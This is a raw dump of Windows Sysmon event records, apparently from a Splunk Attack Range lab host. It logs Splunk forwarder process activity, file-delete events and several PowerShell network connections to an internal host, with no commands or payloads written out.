21:50:10.364{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126787Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:10.364{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8192-613A-9396-03000000C801}1224C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035126786Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:10.349{B81B27B7-8192-613A-9396-03000000C801}1224C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035126817Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:11.462{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE5DC83EC96C48BA8219248850522777,SHA256=A67A54146DDD3E99F4C627AE2A57500F2F7C79D667D228CC51B6A75F22AA84FF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126816Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:11.351{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=87C4C5326796556BC3862729F710440C,SHA256=44194375A660157B12641CB40A24A6B0E61C469BAD402A2E0D3FD2F781A1CE97,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126815Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:11.351{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EC2D95017BF52FF116DE75A72FCC8BAB,SHA256=690E4A650251CCAA925F8BF3D664A1F6904563BD14C466CE093AED75BF83C5FB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126814Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:11.351{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=64EE6FA7B128F373544B15C8EC0DE6DD,SHA256=23F74A309E7C478A18E77BFC30F61D09285DE35CB0DFBD138954D3BDE9A784CE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035126813Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:11.063{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8193-613A-9496-03000000C801}6872C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126812Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:11.063{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126811Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:11.063{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126810Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:11.063{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126809Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:11.063{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126808Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:11.063{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-8193-613A-9496-03000000C801}6872C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035126807Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:11.063{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8193-613A-9496-03000000C801}6872C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035126806Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:11.048{B81B27B7-8193-613A-9496-03000000C801}6872C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035126820Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:37.239{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61943-false10.0.1.12-8000- 23542300x800000000000000035126819Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:12.480{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EAC86F64580190C0839CC8455C96D97,SHA256=E7400D2191BC362865DF056FA2DB8724D7307515F782AFCC2BFDF09D5259D9D2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126818Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:36.478{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61942-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035126821Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:13.498{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3183FD2D4CD8AB005687F8F7F2F83B57,SHA256=8989395B80FE49ED2EDFEFC3DD52D81BF55A2C67F0F4357E77A68315A8D11EBB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126822Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:14.513{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF8B630F80A05958C93125E35EE26B37,SHA256=9BF7DBCD467D54EBA39B577A2663B0F6B2BABD7FE6842C5664DF830ECA13E415,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126823Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:15.543{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48C20C9E889DC997571966E9472C2FC0,SHA256=3368A0225643BD2FAF908BED144E234185C1C4E61304D29FF489A8A01F0502A0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126826Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:41.488{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61944-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035126825Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:16.576{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F0567BBCA33C710C1180C5D7E2F2207,SHA256=763DCCFC5748E6270C7DB4E84C7B44FDE37FBB9FD55807F0AB6FCE7B51C81778,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126824Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:16.478{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=921C4035E7A44CF63E1B1652A1482242,SHA256=2433F5223BBB149FB69DD8706241E661325F8C3D81912B852F637FDD810B787C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126828Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:42.434{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61945-false10.0.1.12-8000- 23542300x800000000000000035126827Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:17.595{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E4E7DD6C7D0371AEBD4F6E79F35CDF2,SHA256=D1DD938BADCA9D8A29748CAD8FCB0E718F978B072C838F49B965CB46A713797E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126829Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:18.609{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FEA32683133DA158B463996E4D6D0F5,SHA256=CC117E2F48E6193E7144212664796F9F25513D99BF278776A1C9DC7A3A1638C2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126830Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:19.639{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27764D9F633D222DAFBB7CA7F0C33E15,SHA256=1FDABF6C56E02475C2575BD74D92BC7D1ECEC13407A982D8951446C11CB195BE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126832Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:20.674{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BBEB1D94BB1E2E31215B4B0E54E352DF,SHA256=37FC836B3329265A70E10A761874C61AC8BDCDA5FA5D0E41E612801C95C15372,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126831Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:20.439{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=874C060F5211DA30182E51184534366A,SHA256=F9A416370C3A1755B672CC35B2C47B2658AB616315CB1FF79F16BF1407334459,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126834Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:21.740{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF85FA24E5FBD7CF982537F458670557,SHA256=E875502F2EB50740E4041BC0A41BD07A8F4A309CF1E878E5409342091B5B783D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126833Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:45.500{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61946-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035126835Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:22.774{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB6F7AB952E2B7CB57740C53F827E386,SHA256=06B100A792968223DEBE7E5C6387147C97ABDF91582C933B6622296A1554C969,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126837Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:23.795{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=978435A570FEACE2F8A65B1A1A8B13B4,SHA256=4093A8ECE7FD4127011B3007669CAD3D6E6D1CBE492C888C430615E1A855E8C7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126836Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:48.215{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61947-false10.0.1.12-8000- 23542300x800000000000000035126838Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:24.812{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59B240140887313A22A3DF59E8697DA9,SHA256=E2404ACE38826BD27E55B1DEAD99C4182D36BF0A4443447408E185C300805E64,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126839Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:25.813{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05F54C2414FA8E1F64A61EDB9A7E70AE,SHA256=DFE85F212B7E461387615BA1AF981E13B561F25FE6F0F74F413D311F064009A1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035126849Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:26.980{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-81A2-613A-9596-03000000C801}5912C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126848Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:26.980{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126847Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:26.980{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126846Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 